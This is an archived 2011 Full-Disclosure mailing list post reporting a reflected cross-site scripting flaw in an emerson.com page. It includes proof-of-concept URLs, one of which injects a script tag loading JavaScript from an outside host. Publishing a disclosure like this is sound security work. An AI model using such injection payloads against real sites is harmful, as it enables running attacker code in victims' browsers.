| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CACjdTt_+W2=j1TF_5nZm8NUdXctHTZVAmHmLqcHxX_Y+sZeMDQ@mail.gmail.com>
Date: Mon, 5 Sep 2011 02:00:10 +0530
From: Madhur Ahuja <ahuja.madhur@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: XSS Vulnerability in www.emerson.com
One of the pages in Emerson site are rendering the query string parameter
without any inspection. This makes it possible to inject malicious content
as shown below:
http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E
--
Madhur
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists